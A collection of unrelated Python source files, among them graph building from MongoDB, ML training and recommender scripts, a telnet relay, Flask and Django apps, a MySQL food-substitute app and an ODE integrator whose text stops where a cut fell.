collection = config.get('mongodb', 'collection')
statistics_collection = config.get('mongodb', 'stats_collection')
id_collection = config.get('mongodb', 'id_collection')
edgelist = []
dictionary = dict()
edgedict = dict()
nodeDict = dict()
users = dict()
#Makes it so that only nodes with 5 posts or higher gets added to edgelist
for doc in db[statistics_collection].find({'value.posts': {'$gt': 5}}):
users[doc.get('_id')] = 1
#Add new edge to the list
def append_graph(username, connections):
gen = []
for c in connections:
if(users.get(c) is not None) and (edgedict.get(username+c) is None) and (edgedict.get(c+username) is None):
edgedict[username+c] = (dictionary.get(c), dictionary.get(username))
nodeDict[c] = 1
nodeDict[username] = 1
if len(edgedict.keys()) % 5000 == 0:
if 0 != len(edgelist):
print(edgedict.get(username+connections[0]))
print(len(edgedict.keys()))
#Create id numbers for each user.
def create_idNum():
i = 0
for doc in db[statistics_collection].find():
db[statistics_collection].update({'_id': doc.get("_id")}, {'$set': {'idNum': i}})
dictionary[doc.get("_id")] = i
i = i+1
print "added idnumer"
#Create the list of edges with users having 5 or more posts
def creat_list():
x = 0
for doc in db[statistics_collection].find({'value.posts': {'$gt': 5}}):
x = x + 1
append_graph(doc.get("_id"), list(set(doc.get("value").get("friends"))))
print "list is ready"
# write edges to file
with open('edgelist.txt', 'w') as f:
for k in edgedict.values():
line = ' '.join(str(x) for x in k)
f.write(line + '\n')
print "Number of nodes "+ str(len(nodeDict.keys()))
#Create collection with documents in edgelist
for document in db[statistics_collection].find():
if nodeDict.get(document.get("_id")) is not None:
db[id_collection].insert(document)
i = 0
#Set new id numbers and save in dictionarty.
dictionaryNewID = dict()
for doc1 in db[id_collection].find():
dictionaryNewID[doc1.get("idNum")] = i
db[id_collection].update({'_id': doc1.get("_id")}, {'$set': {'idNum': i}})
i = i+1
#update the edgelist with new id numbers
"Number of nodes " + str(len(dictionaryNewID.keys()))
with open('edgelist.txt','r') as f:
with open('NewEdgelist.txt', 'w') as fp:
line = f.readline().strip('\n')
while line:
val = line.split(' ')
s = str(dictionaryNewID.get(int(val[0])))+' '+str(dictionaryNewID.get(int(val[1])))+'\n'
fp.write(s)
line = f.readline().strip('\n')
print "Number of edges " + str(len(edgedict.keys()))
if __name__ == '__main__':
print len(users)
create_idNum()
creat_list()
|
987,123 | a6c759adb6d381c3b36f61552eddb2eac15b9b09 | from .AnimGroup import AnimGroup
# This is the root of an AnimChannel hierarchy. It
# knows the frame rate and number of frames of all the
# channels in the hierarchy (which must all match).
class AnimBundle(AnimGroup):
def __init__(self, bam_file, bam_version):
AnimGroup.__init__(self, bam_file, bam_version)
def load(self, di):
AnimGroup.load(self, di)
self.fps = di.get_float32()
self.num_frames = di.get_uint16()
def write(self, write_version, dg):
AnimGroup.write(self, write_version, dg)
dg.add_float32(self.fps)
dg.add_uint16(self.num_frames)
def __str__(self):
return f'AnimBundle(fps={self.fps}, num_frames={self.num_frames}, {AnimGroup.__str__(self)})'
|
987,124 | b6a87b06cda22b2750d49f6f1c248a451f8081c8 | if __name__ == '__main__':
import context
from autem.evaluators import Evaluater
from benchmark.utility import *
from pathlib import Path
import os
import csv
import pandas
import numpy as np
# from benchmark.download_opemml_task import download_task_data
def baselines_directory():
return Path("benchmark/baselines")
def baseline_configuration_filename():
return benchmark_directory().joinpath("Configuration.xlsx")
def load_baseline_configuration_data():
filename = baseline_configuration_filename()
df = pandas.read_excel(filename)
return df
def get_baseline_names(experiment, status = "Run"):
df = load_baseline_configuration_data()
dfa = df[df[experiment] == status]
return dfa.Name
def get_baseline_configuration(name):
df = load_baseline_configuration_data()
dfa = df[df['Name'] == name]
configuration = dfa.to_dict('records')[0]
return configuration
def baseline_directory(baseline_name):
return baselines_directory().joinpath(baseline_name)
def baseline_data_filename(baseline_name):
return baseline_directory(baseline_name).joinpath("baseline.csv")
def load_baseline_data(baseline_name):
filename = baseline_data_filename(baseline_name)
df = pandas.read_csv(filename)
return df
def get_baseline_stats(baseline_name):
df = load_baseline_data(baseline_name)
n_runs = df.shape[0]
scores = df.predictive_accuracy
median_score = np.median(scores)
max_score = np.max(scores)
min_score = np.min(scores)
top_1p = np.percentile(scores, 99)
top_5p = np.percentile(scores, 95)
top_10p = np.percentile(scores, 90)
top_qtr = np.percentile(scores, 75)
stats = {
"n_runs": n_runs,
"median_score": median_score,
"max_score": max_score,
"min_score": min_score,
"top_1p": top_1p,
"top_5p": top_5p,
"top_10p": top_10p,
"top_qtr": top_qtr
}
return stats
class BaselineStats(Evaluater):
"""
Rater that reports on the members baseline
"""
def __init__(self, baseline_name):
self.baseline_name = baseline_name
def prepare_simulation(self, simulation):
super().prepare_simulation(simulation)
baseline_name = self.baseline_name
stats = get_baseline_stats(baseline_name)
simulation.set_state("baseline_stats", stats)
def record_member(self, member, record):
stats = member.get_simulation().get_state("baseline_stats")
record.BL_top_score = stats["max_score"]
record.BL_top_5p_score = stats["top_5p"]
if __name__ == '__main__':
names = get_baseline_names("Select")
for name in names:
print(get_baseline_stats(name))
|
987,125 | ab5e1343c4eed1e52f9a4cfc7c589c4c07366198 | import time
import re
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
# Configurations
options = Options()
options.headless = True
driver = webdriver.Chrome(options=options)
def urls_views(url, delay, views):
output = {}
i = 0
# Check url
regex = re.compile(
r'^(?:http|ftp)s?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
if re.match(regex, url) is not None:
while i <= views:
page = ''
while page == '':
try:
page = driver.get(url)
WebDriverWait(driver, 30).until(
EC.text_to_be_present_in_element(
(By.CLASS_NAME, 'timer'), # Element filtration
'0' # The expected text
)
)
output = {i: url}
break
except:
print("Connection refused by the server..")
print("Let me sleep for 5 seconds")
print("ZZzzzz...")
time.sleep(delay)
print("Was a nice sleep, now let me continue...")
continue
i += 1
print(f" Visitado {i} veces")
else:
# print(f"La direccion web es incorrecta --> {url}")
output = {'Error': url}
return output
def close_connection():
driver.close()
|
987,126 | cd809d0b3edc4605b9a0f393e9a767281816dde7 |
from sklearn.datasets import load_files
from keras.utils import np_utils
import numpy as np
from glob import glob
# define function to load train, test, and validation datasets
def load_dataset(path):
data = load_files(path)
dog_files = np.array(data['filenames'])
dog_targets = np_utils.to_categorical(np.array(data['target']), 133)
return dog_files, dog_targets
# load train, test, and validation datasets
# train_files, train_targets = load_dataset('D:/Courses/Udacity Nanodegrees/Machine Learning Nanodegree/Projects/Project 3 - Dog Breed Classifier/dog_breed_classifier/dogImages/train')
# valid_files, valid_targets = load_dataset('D:/Courses/Udacity Nanodegrees/Machine Learning Nanodegree/Projects/Project 3 - Dog Breed Classifier/dog_breed_classifier/dogImages/valid')
# test_files, test_targets = load_dataset('D:/Courses/Udacity Nanodegrees/Machine Learning Nanodegree/Projects/Project 3 - Dog Breed Classifier/dog_breed_classifier/dogImages/test')
# load list of dog names
dog_names = [item[20:-1] for item in sorted(glob('D:/Courses/Udacity Nanodegrees/Machine Learning Nanodegree/Projects/Project 3 - Dog Breed Classifier/dog_breed_classifier/dogImages/train/*/'))]
# print statistics about the dataset
# print('There are %d total dog categories.' % len(dog_names))
# print('There are %s total dog images.\n' % len(np.hstack([train_files, valid_files, test_files])))
# print('There are %d training dog images.' % len(train_files))
# print('There are %d validation dog images.' % len(valid_files))
# print('There are %d test dog images.'% len(test_files))
# ### Import Human Dataset
#
# In the code cell below, we import a dataset of human images, where the file paths are stored in the numpy array `human_files`.
# In[2]:
# import random
# random.seed(8675309)
# load filenames in shuffled human dataset
# human_files = np.array(glob("lfw/*/*"))
# random.shuffle(human_files)
# print statistics about the dataset
# print('There are %d total human images.' % len(human_files))
import cv2
import matplotlib.pyplot as plt
# returns "True" if face is detected in image stored at img_path
def face_detector(img_path):
img = cv2.imread(img_path)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray)
return len(faces) > 0
from keras.preprocessing import image
from tqdm import tqdm
def path_to_tensor(img_path):
# loads RGB image as PIL.Image.Image type
img = image.load_img(img_path, target_size=(224, 224))
# convert PIL.Image.Image type to 3D tensor with shape (224, 224, 3)
x = image.img_to_array(img)
# convert 3D tensor to 4D tensor with shape (1, 224, 224, 3) and return 4D tensor
return np.expand_dims(x, axis=0)
def paths_to_tensor(img_paths):
list_of_tensors = [path_to_tensor(img_path) for img_path in tqdm(img_paths)]
return np.vstack(list_of_tensors)
from keras.applications.resnet50 import preprocess_input, decode_predictions
#
# def ResNet50_predict_labels(img_path):
# # returns prediction vector for image located at img_path
# img = preprocess_input(path_to_tensor(img_path))
# return np.argmax(ResNet50_model.predict(img))
#
### returns "True" if a dog is detected in the image stored at img_path
def dog_detector(img_path):
prediction = ResNet50_predict_labels(img_path)
return ((prediction <= 268) & (prediction >= 151))
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
# pre-process the data for Keras
# train_tensors = paths_to_tensor(train_files).astype('float32')/255
# valid_tensors = paths_to_tensor(valid_files).astype('float32')/255
# test_tensors = paths_to_tensor(test_files).astype('float32')/255
# In[13]:
from keras.layers import Conv2D, MaxPooling2D, GlobalAveragePooling2D
from keras.layers import Dropout, Flatten, Dense
from keras.models import Sequential
model = Sequential()
# print(train_tensors.shape[1:])
# print(len(dog_names))
from keras.callbacks import ModelCheckpoint
# bottleneck_fetures_Xception = np.load('/data/bottleneck_features/DogXceptionData.npz')
# valid_Xception = bottleneck_fetures_Xception['valid']
# test_Xception = bottleneck_fetures_Xception['test']
# train_Xception = bottleneck_fetures_Xception['train']
# print(train_Xception.shape)
### TODO: Define your architecture.
Xception_model = Sequential()
Xception_model.add(GlobalAveragePooling2D(input_shape = ( 7, 7, 2048)))
Xception_model.add(Dropout(0.3))
Xception_model.add(Dense(512, activation = 'relu'))
Xception_model.add(Dropout(0.3))
Xception_model.add(Dense(len(dog_names), activation='softmax'))
Xception_model.summary()
### TODO: Compile the model.
Xception_model.compile(loss='categorical_crossentropy', optimizer='rmsprop',metrics=['accuracy'])
### TODO: Train the model.
# checkpointer_Xception = ModelCheckpoint(filepath=r'D:\Courses\Udacity Nanodegrees\Machine Learning Nanodegree\Projects\Project 3 - Dog Breed Classifier\dog_breed_classifier\saved_models\weights_best_Xception.hdf5', verbose=1, save_best_only=True)
# Xception_model.fit(train_Xception, train_targets, validation_data=(valid_Xception, valid_targets),
# callbacks=[checkpointer_Xception], nb_epoch=25, batch_size = 40, verbose = 1)
# ### (IMPLEMENTATION) Load the Model with the Best Validation Loss
# In[29]:
### TODO: Load the model weights with the best validation loss.
Xception_model.load_weights(r'D:\Courses\Udacity Nanodegrees\Machine Learning Nanodegree\Projects\Project 3 - Dog Breed Classifier\dog_breed_classifier\saved_models\weights_best_Xception.hdf5')
# get index of predicted dog breed for each image in test set
Xception_predictions = [np.argmax(Xception_model.predict(np.expand_dims(feature, axis=0))) for feature in test_Xception]
# report test accuracy
# test_accuracy = 100*np.sum(np.array(Xception_predictions)==np.argmax(test_targets, axis=1))/len(Xception_predictions)
# print('Test accuracy: %.4f%%' % test_accuracy)
def Xception_predict_breed(img_path):
# extract bottleneck features
# print('image shape: ', img_path)
image_tensor = path_to_tensor(img_path)
# print('tensor shape: ', image_tensor.shape)
image_bottleneck_feature = extract_Xception(image_tensor)
# print('bottleneck features shape: ', image_bottleneck_feature.shape)
# obtain predicted vector
predicted_vector_Xception = Xception_model.predict(image_bottleneck_feature)
# return dog breed that is predicted by the model
return dog_names[np.argmax(predicted_vector_Xception)]
# a function that checks if the image contains a face or a dog and returns the corresponding string to be printed
# import matplotlib.image as mpimg
# def dog_or_human(filepath):
# dog = dog_detector(filepath)
# human = face_detector(filepath)
# return dog, human
# def classify_dog_breed(filepath):
# # img = mpimg.imread(filepath)
# # fig = plt.figure()
# # ax = fig.add_subplot(1,1,1)
# # ax.imshow(img) #show image
# img = cv2.imread(filepath)
# # cv2.imshow('img', img)
# # dog, human = dog_or_human(filepath)
# if(dog):
# breed = Xception_predict_breed(filepath)
# print('You look like a', breed)
# elif(human):
# breed = Xception_predict_breed(filepath)
# print("If you were a dog you'd be a", breed)
# else:
# print("This is neither a dog nor a valid human face!")
def classify_dog_breed(filepath):
# img = mpimg.imread(filepath)
# fig = plt.figure()
# ax = fig.add_subplot(1,1,1)
# ax.imshow(img) #show image
img = cv2.imread(filepath)
# cv2.imshow('img', img)
# dog, human = dog_or_human(filepath)
breed = Xception_predict_breed(filepath)
print('You look like a', breed)
classify_dog_breed(r'D:\Courses\Udacity Nanodegrees\Machine Learning Nanodegree\Projects\Project 3 - Dog Breed Classifier\dog_breed_classifier\testing_files\me.jpg')
cv2.waitKey(0)
|
987,127 | 53d2566ac0e63936b8d1854c076faf74c3b6d45c | from keras.applications.vgg16 import VGG16
import numpy as np
class NnFeatureLoader:
def __init__(self):
self.model = VGG16(weights='imagenet', include_top=False)
def describe_model(self):
self.model.summary()
def __get_feature(self, image):
image = np.resize(image, (1, 224, 224, 3))
return self.model.predict(image).flatten()
def __get_features(self, images):
images = np.dstack([images] * 3)
images = images.reshape(-1, 28, 28, 3)
images = images.astype('float32')
result = []
for img in images:
img = self.__get_feature(img)
result.append(img)
return np.array(result)
def save_features(self, images, prefix):
features = self.__get_features(images)
np.savetxt(f"data/features/nn_{prefix}.csv", features, delimiter=",")
def load_features(self, prefix):
return np.genfromtxt(f"data/features/nn_{prefix}.csv", delimiter=',')
|
987,128 | 6e5c256b9a5b9133cbeac2c7393548afbb611a65 | #!/usr/bin/env python3
import logging
import queue
import socket
import threading
lock = threading.Lock()
logging.basicConfig(
format='%(asctime)-15s %(clientip)-15s %(call)-8s %(message)s')
logger = logging.getLogger('telnetrelay')
logger.setLevel(logging.INFO)
clients = []
class RelayServer(threading.Thread):
def __init__(self, info):
threading.Thread.__init__(self)
self.socket = info[0]
self.address = info[1]
self.loginfo = {'clientip': self.address[0], 'call': '---'}
self.queue = queue.Queue()
def run(self):
lock.acquire()
clients.append(self)
lock.release()
logger.info('new connection', extra=self.loginfo)
if not self.login():
return
self.loop()
def login(self):
self.socket.send(b'Please enter your call: ')
call = self.socket.recv(20)
if not call:
return False
self.loginfo['call'] = call.decode('utf-8').strip()
logger.info('logged in', extra=self.loginfo)
self.socket.send(b'>\r\n\r\n')
return True
def loop(self):
while True:
spot = self.queue.get()
try:
self.socket.send(spot + b'\r\n')
except:
self.terminate()
break
def terminate(self):
lock.acquire()
clients.remove(self)
lock.release()
logger.info('logged out', extra=self.loginfo)
try:
self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
except:
pass
def sendSpot(self, spot):
self.queue.put(spot)
class RelayClient(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def run(self):
self.skt.connect(('telnet.reversebeacon.net', 7000))
self.login()
self.loop()
def login(self):
msg = self.skt.recv(1024)
self.skt.send(b'PD7LOL\r\n')
self.skt.recv(1024)
def loop(self):
loginfo = {'clientip': '', 'call': ''}
while True:
spots = self.skt.recv(1024)
for spot in spots.split(b'\r\n'):
spot = spot.strip()
if spot == b'':
continue
loginfo['clientip'] = len(clients)
logger.debug(spot.decode('utf-8'), extra=loginfo)
lock.acquire()
for client in clients:
client.sendSpot(spot)
lock.release()
if __name__ == '__main__':
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
skt.bind(('', 7000))
skt.listen(4)
client = RelayClient()
client.start()
while True:
RelayServer(skt.accept()).start()
|
987,129 | 8e8b282e18b02f5e2fdc9671d45ddf8e8b1b6cd2 | c = get_config()
load_subconfig('etc/base_config.py')
c.JupyterHub.authenticator_class = 'everware.DummyTokenAuthenticator'
c.Spawner.start_timeout = 120
c.Spawner.http_timeout = 120 # docker sometimes doesn't show up for a while
|
987,130 | b0dd05a2ff4f019630dd666ecb3f278a5a5bc761 | import numpy as np
import matplotlib.pyplot as plt
world = np.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 0, 1, 0, 0],
[0, 1, 1, 0, 0, 0, 1, 1, 0],
[0, 1, 1, 1, 0, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 0, 1, 1, 0],
[0, 1, 1, 1, 1, 1, 1, 1, 0],
[0, 1, 0, 1, 1, 1, 1, 1, 0],
[0, 1, 0, 1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]])
reward = np.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 2, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 2, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0]])
# plot world
plt.imshow(world)
plt.title("1 : available position\n0 : not available position")
plt.colorbar()
plt.savefig("images/world.pdf")
plt.close()
# plot reward
plt.imshow(reward)
plt.title("reward")
plt.colorbar()
plt.savefig("images/reward.pdf")
plt.close()
np.save("world.npy", world)
np.save("reward.npy", reward)
|
987,131 | 0a342aa5b98dc92eb518205fd59c55d66f47dca9 | import pandas as pd
import numpy as np
from ast import literal_eval
import warnings; warnings.simplefilter('ignore')
# Load Movies md
md = pd.read_csv('data/movies_metadata.csv', low_memory=False)
# Print the first three rows
#print(md.head(3))
md['genres'] = md['genres'].fillna('[]').apply(literal_eval).apply(lambda x: [i['name'] for i in x] if isinstance(x, list) else [])
md['year'] = pd.to_datetime(md['release_date'], errors='coerce').apply(lambda x: str(x).split('-')[0] if x != np.nan else np.nan)
def popularity(percentile=0.95):
vote_counts = md[md['vote_count'].notnull()]['vote_count'].astype('int')
vote_averages = md[md['vote_average'].notnull()]['vote_average'].astype('int')
C = vote_averages.mean()
m = vote_counts.quantile(percentile)
qualified = md[(md['vote_count'] >= m) & (md['vote_count'].notnull()) & (md['vote_average'].notnull())][['title', 'year', 'vote_count', 'vote_average', 'popularity', 'genres']]
qualified['vote_count'] = qualified['vote_count'].astype('int')
qualified['vote_average'] = qualified['vote_average'].astype('int')
qualified['score'] = qualified.apply(lambda x: (x['vote_count']/(x['vote_count']+m) * x['vote_average']) + (m/(m+x['vote_count']) * C), axis=1)
qualified = qualified.sort_values('score', ascending=False).head(10)
return qualified
s = md.apply(lambda x: pd.Series(x['genres']),axis=1).stack().reset_index(level=1, drop=True)
s.name = 'genre'
gen_md = md.drop('genres', axis=1).join(s)
def popularity_by_genre(genre, percentile=0.85):
df = gen_md[gen_md['genre'] == genre]
vote_counts = df[df['vote_count'].notnull()]['vote_count'].astype('int')
vote_averages = df[df['vote_average'].notnull()]['vote_average'].astype('int')
C = vote_averages.mean()
m = vote_counts.quantile(percentile)
qualified = df[(df['vote_count'] >= m) & (df['vote_count'].notnull()) & (df['vote_average'].notnull())][['title', 'year', 'vote_count', 'vote_average', 'popularity']]
qualified['vote_count'] = qualified['vote_count'].astype('int')
qualified['vote_average'] = qualified['vote_average'].astype('int')
qualified['score'] = qualified.apply(lambda x: (x['vote_count']/(x['vote_count']+m) * x['vote_average']) + (m/(m+x['vote_count']) * C), axis=1)
qualified = qualified.sort_values('score', ascending=False).head(250)
return qualified
#print(popularity_by_genre('Adventure').head(15))
#print(popularity())
|
987,132 | 3dcdbdeeb3e2401e4e1c6eb6302ecd1787574135 | import cPickle
import threading
from Client import client
from python.src.shared.actions.basetorobot.getlinetra import GetLineTra
from python.src.shared.actions.basetorobot.startrobot import StartRobot
from python.src.shared.actions.basetorobot.newturn import NewTurn
class Base():
def __init__(self):
self._client = client()
def __send(self, action):
self._client.send(cPickle.dumps(action))
def setObstacle(self,x1,y1,x2,y2):
self.Ox1 = x1
self.Oy1 = y1
self.Ox2 = x2
self.Oy2 = y2
def connectToRobot(self, ip, port):
self._client.connect(ip, int(port))
self._client.listen()
def NewTurn(self):
self.__send(NewTurn())
def StartRobot(self):
self.__send(StartRobot(self.Ox1,self.Oy1,self.Ox2,self.Oy2))
|
987,133 | 385b95133c0e3c085a5a1913291605a4b004f58e | size_valid = 0.15
path_raw_train_csv = '/home/muyun99/competition/classification/data/kaggle_classify_leaves/classify-leaves/train.csv'
path_raw_test_csv = '/home/muyun99/data/dataset/competition_data/kaggle_classify_leaves/classify-leaves/test.csv'
path_save_trainval_csv = '/home/muyun99/competition/classification/data/kaggle_classify_leaves/dataset'
path_save_test_csv = '/home/muyun99/competition/classification/data/kaggle_classify_leaves/dataset'
path_save_classmap_txt = '/home/muyun99/competition/classification/data/kaggle_classify_leaves/dataset/classmap.txt'
path_train_img = '/home/muyun99/competition/classification/data/kaggle_classify_leaves/classify-leaves/images'
num_KFold = 5
seed_random = 2021
|
987,134 | bba87a4d9d6d052a4e983c7180c6784ba545485d | '''
Diêgo C. Oliveira
Tec. em Informática | IFPI
Programação para Web | Ritomar Torquato
Turma 386, Periodo 2017.1
Escreva um programa que pergunte a quantidade de km percorridos por um carro alugado pelo usuário, assim como a
quantidade de dias pelos quais o carro foi alugado. Calcule o preço a pagar, sabendo que o carro custa R$ 60,00 por dia
e R$ 0,15 por km rodado.
'''
km = float(input('Digite os km rodados: '))
dias = int(input('Quantidade de dias: '))
preço = 60*dias + 0.15*km
print('\nTotal a pagar: R$ %.2f' %preço) |
987,135 | 3ed861c2fa588cac94326a28dcb2cf8565b72ea6 | import math
def update_category_max(category_max, category_min, category_size):
return category_min + category_size
def get_size_of_categories(number_of_categories):
return math.floor(255 / number_of_categories)
def get_category_median(category_min, category_size):
return category_min + math.ceil(category_size / 2)
def create_category(category_max, category_min, category_size):
category = {
'min' : category_min,
'max' : category_max,
'median' : get_category_median(category_min, category_size)
}
return category
def update_category_min(category_max, category_min):
return category_max + 1
def get_colour_categories(number_of_categories):
colour_categories = []
category_size = get_size_of_categories(number_of_categories)
category_min = 0
category_max = 0
for _ in range(number_of_categories):
category_max = update_category_max(category_max, category_min, category_size)
category = create_category(category_max, category_min, category_size)
colour_categories.append(category)
category_min = update_category_min(category_max, category_min)
return colour_categories
def get_categories(red_category_number, green_category_number, blue_category_number):
min_limit = 0
max_limit = 255
rgb_categories = {
'red' : get_colour_categories(red_category_number),
'green' : get_colour_categories(green_category_number),
'blue' : get_colour_categories(blue_category_number)
}
return rgb_categories
|
987,136 | 58f479dc89ae783d57d96d3750ab4383f03265b3 | from django.db import models
from products.models import Products
from users.models import CustomUser
class Review(models.Model):
id = models.AutoField(null=False,blank=False,primary_key=True)
products_id = models.ForeignKey(Products,on_delete=models.RESTRICT)
user_id = models.ForeignKey(CustomUser, on_delete= models.RESTRICT, related_name= '+')
description = models.CharField(null= False,blank=False ,max_length=225)
rate = models.IntegerField(null= False,blank= False,default=0)
created_at = models.DateTimeField(null= False, blank= False, auto_now=True)
updated_at = models.DateTimeField( null=False,blank=False , auto_now=True)
created_user = models.ForeignKey(CustomUser, on_delete= models.RESTRICT, related_name= '+')
updated_user = models.ForeignKey(CustomUser, on_delete= models.RESTRICT, related_name= '+')
is_archived = models.BooleanField(null= False, blank= False, default= False)
def __str__(self):
return str('Products: {}'.format(self.products_id))
|
987,137 | 533e8603e44b5854aae8fb23d9a6005cdc3e8b17 | import os
from datetime import datetime
from flask import Flask, redirect, render_template, request, session
app = Flask(__name__)
app.secret_key = "random123"
messages = []
def add_message(username, message):
"""add messages to the list"""
now = datetime.now().strftime("%H:%M:%S")
messages.append("({}) {}: {}".format(now, username, message))
def get_all_message():
"""Gets all messages and seperates with a break"""
return "<br>".join(messages)
@app.route('/', methods =["GET", "POST"])
def index():
"""Main Page with instructions"""
if request.method == "POST":
session["username"] = request.form["username"]
if "username" in session:
return redirect(session["username"])
return render_template("index.html")
@app.route('/<username>')
def user(username):
"""Display Chat Messages"""
return "<H1>Welcome, {0}</H1>{1}".format(username, get_all_message())
@app.route('/<username>/<message>')
def send_message(username, message):
"Create a new message and redirect back to the chat page"
add_message(username, message)
return redirect("/" + username)
app.run(host=os.getenv('IP'), port=int(os.getenv('PORT')),debug=True) |
987,138 | 209f41198bf1bb92ba35b1bfd796ecaa4f5e8ef3 | """File linked with 'main_user.py' """
import pymysql.cursors
try:
import config
except ImportError:
print("No configuration file found")
exit()
def host():
""" Display the 'home menu' """
print(""" Bienvenue sur l'application Pur Beurre
--------------------------------------------
1: Quel aliment souhaitez-vous remplacer ?
2: Retrouver mes aliments substitués
3: Quitter""")
while True:
try:
choice = int(input("Entrez votre choix: \n"))
if choice in range(1, 4):
break
except ValueError:
continue
return choice
class Interface:
""" Class which generate the User interface and useful
to connect on your database (put your own information's connection
to access to your database) """
def __init__(self):
self.connection = pymysql.connect(host= config.DATABASE_HOST,
user= config.DATABASE_USER,
password= config.DATABASE_PASSWORD,
db= config.DATABASE_NAME,
charset= config.DATABASE_CHARSET)
self.cursor = self.connection.cursor()
def categories_choice(self):
""" Display the category menu , limited to 5 choices"""
self.cursor.execute(""" SELECT id, name
FROM category
ORDER BY id LIMIT 5 OFFSET 0""")
rows = self.cursor.fetchall()
print("Choisissez votre catégorie :")
possible_choice = []
while True:
try:
for row in rows:
possible_choice.append(row[0])
print(row[0], row[1])
choice = int(input("Entrez votre choix: \n"))
if choice in possible_choice:
break
except ValueError:
continue
return choice
def food_choice(self, category_id):
""" Display the 'food menu' """
self.cursor.execute(""" SELECT food.id, food.name
FROM food
INNER JOIN category_food
ON food.id = category_food.food_id
WHERE category_food.category_id = %s && nutriscore > 'b'
ORDER BY id LIMIT 8 OFFSET 0""", category_id)
rows = self.cursor.fetchall()
print("Choisissez votre aliment :")
possible_choice = []
while True:
try:
for row in rows:
possible_choice.append(row[0])
print(row[0], row[1])
choice = int(input("Entrez votre choix: \n"))
if choice in possible_choice:
break
except ValueError:
continue
return choice
def insert_in_favourite(self, food_id, substitute_id):
""" Menu which allow the user to save his current research """
ref = (food_id, substitute_id)
print("""\n Souhaitez-vous ajouter cette recherche dans vos favoris ?
1. Oui
0. Non """)
choice = int(input("Entrez votre choix: \n"))
if choice == 1:
self.cursor.execute("""INSERT INTO favourite
(food_id, substitute_id)
VALUES (%s, %s)""", ref)
else:
return
def substitute_display(self, category_id, food_id):
""" When the user has choosen his food, display a substitute healthier
with all the informations needed"""
ref = category_id, food_id
self.cursor.execute(""" SELECT food.name, store.name,
food.link_openffacts,
food.nutriscore, food.description, food.id
FROM food
INNER JOIN store_food
ON food.id = store_food.food_id
INNER JOIN store
ON store_food.store_id = store.id
WHERE food.id IN (SELECT category_food.food_id
FROM category_food
WHERE category_food.category_id = %s)
AND food.id != %s
ORDER BY food.nutriscore
LIMIT 1 OFFSET 0""", ref)
row = self.cursor.fetchone()
print("Voici un subistitut de votre choix initial : ")
print("Nom du produit : " + row[0])
print("Grade nutriscore : " + row[3])
print("Lien OpenFoodFacts : " + row[2])
print("Magasin(s) : " + row[1])
print("Description du produit : " + row[4])
return row[5]
def favourite_screen(self):
"""Display all the foods that the user saved previously """
self.cursor.execute(""" SELECT *
FROM favourite
ORDER BY id """)
rows = self.cursor.fetchall()
print("Voici vos recherches sauvegardées: \n")
for row in rows:
ref = row[1], row[2]
self.cursor.execute(""" SELECT name
FROM food
WHERE id = %s
UNION
SELECT name
FROM food
WHERE id = %s """, ref)
food_names = self.cursor.fetchall()
i = 0
for element in food_names:
if i == 0:
print("Produit initial : " + element[0].upper(), end="")
i += 1
else:
print(" substitué par : " + element[0].upper())
print("----------------------------------------------------------")
|
987,139 | 224731f0292b04850d348d9d7fcf24c2694cd34d | ########################################
## @file rk_integrator.py
# @brief Contains the class of RK ODE integrator
# @author Zhisong Qu (zhisong.qu@anu.edu.au)
#
from .base_integrator import BaseIntegrator
from scipy.integrate import ode
import numpy as np
## RKIntegrator wraps the explicit Runge-Kutta implimented in scipy.integrate.ode. for use of pyoculus
#
# Default integrator for pyoculus. Not very fast but versatile and robust.
#
# See __init__ for how to set up the integrator
class RKIntegrator(BaseIntegrator):
def __init__(self, params):
"""! Sets up the ODE solver
@param params dict, the parameters used in the ODE solver
<code>params['ode']</code> -- callable f: rhs=f(t,x,arg1), must provide
<code>params['args']=None</code> -- the argment that will be used to call f
<code>params['rtol']=1e-7</code> -- relative tolerance
<code>params['type']='dopri5'</code> -- the type of integrator, 'dopri5' for RK45, 'dop853' for RK853
"""
# check if the ode is provided. If not, raise an error
if "ode" not in params.keys():
raise ValueError("Please specify the ODE to solve for the Integrator class")
else:
self.rhs = params["ode"]
if "type" not in params.keys():
params["type"] = "dopri5" # set default to RK45
if params["type"] not in ["dopri5", "dop853"]:
raise ValueError(
"Please specify the correct type of RK solver, dopri5 for RK45, dop853 for RK853"
)
if "rtol" not in params.keys():
params["rtol"] = 1e-7 # set to default value
self.rtol = params["rtol"]
if "args" not in params.keys():
params["args"] = None
self.args = params["args"]
# set up the integrator
self.integrator = ode(self.rhs).set_integrator(
params["type"], rtol=params["rtol"]
)
super().__init__(params)
def set_initial_value(self, t, x):
"""! Sets up the initial value for the ODE solver
@param t the start of time
@param x the start of coordinates
"""
self.integrator.set_initial_value(x, t).set_f_params(self._params["args"])
try:
testoutput = self.rhs(t, x, self.args)
except:
print("ODE function not callable")
raise
super().set_initial_value(t, x)
def integrate(self, tend):
"""! Integrates the ODE until `tend`
@param tend the target end time
@returns the new value of x
"""
x_new = self.integrator.integrate(tend)
